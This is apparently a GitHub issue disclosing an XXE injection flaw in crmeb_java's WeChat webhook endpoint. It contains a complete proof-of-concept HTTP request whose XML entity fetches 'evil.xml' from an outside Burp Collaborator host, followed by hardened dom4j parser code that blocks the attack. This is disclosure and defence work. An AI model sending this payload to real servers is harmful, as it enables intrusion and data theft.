
There is an XXE injection vulnerability in the crmeb_java system /api/public/wechat/message/webHook

Open Tyaoo opened this issue 2 years ago • 0 comments

[Suggested description] There is an XXE Injection vulnerability in crmeb_java <=1.3.4, which is triggered by the SAXReader component.

[Vulnerability Type] XML External Entity (XXE) Injection

[Vendor of Product] https://github.com/crmeb/crmeb_java

[Affected Product Code Base] <=1.3.4

[Affected Component] /api/public/wechat/message/webHook

[Attack Type] Remote

[Vulnerability details] Send the crafted request package to the api interface /api/public/wechat/message/webHook

POST /api/public/wechat/message/webHook HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-zation: dbdd777e27b94979adf06fc3fd20ee68
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Content-Type: application/xml
Content-Length: 180

<?xml version="1.0"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://8r0e5uqbuix3subuusrvl4ec43atyi.burpcollaborator.net/evil.xml" >]>
<foo>&xxe;</foo>


[Impact Code execution] true

[Cause of vulnerability] The interface /api/public/wechat/message/webHook calls the function init. It calls the function xmlToMap. There is an XXE Injection vulnerability with the SAXReader component.

That's all, thanks.

Tyaoo, Mar 16 '23 05:03
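A hardened form of the xmlToMap parsing step named in the issue, added here as an illustration and not code from crmeb_java: it configures dom4j's SAXReader to reject DOCTYPE declarations and external entities before it parses a webhook body, so the DOCTYPE/ENTITY shape of the PoC above is refused before any entity is fetched. The class name, the method shape, the sample messages and the placeholder URL are assumptions.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;
import org.dom4j.Document;
import org.dom4j.DocumentException;
import org.dom4j.Element;
import org.dom4j.io.SAXReader;
import org.xml.sax.SAXException;

public class HardenedXmlToMap {

    // Builds a SAXReader that refuses DTDs and never resolves external entities.
    static SAXReader hardenedReader() throws SAXException {
        SAXReader reader = new SAXReader();
        // WeChat webhook messages never need a DOCTYPE, so reject it outright.
        reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a parser implementation ignores the feature above.
        reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
        reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return reader;
    }

    // Hypothetical replacement for the project's xmlToMap: flattens the root's
    // child elements into an element-name -> text map using the hardened reader.
    static Map<String, String> xmlToMap(String xml) throws SAXException, DocumentException {
        Document doc = hardenedReader().read(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        Map<String, String> map = new LinkedHashMap<>();
        for (Object o : doc.getRootElement().elements()) {
            Element child = (Element) o; // cast keeps this working on dom4j 1.x and 2.x
            map.put(child.getName(), child.getTextTrim());
        }
        return map;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample of a benign webhook body (not captured from a real system).
        String benign = "<xml><ToUserName>gh_demo</ToUserName><MsgType>text</MsgType></xml>";
        System.out.println(xmlToMap(benign));

        // Same DOCTYPE/ENTITY structure as the issue's PoC, with a placeholder host.
        String withDoctype = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "
                + "\"http://placeholder.invalid/evil.xml\">]><foo>&xxe;</foo>";
        try {
            xmlToMap(withDoctype);
        } catch (DocumentException e) {
            // Expected path: parsing aborts on the DOCTYPE, nothing is fetched.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```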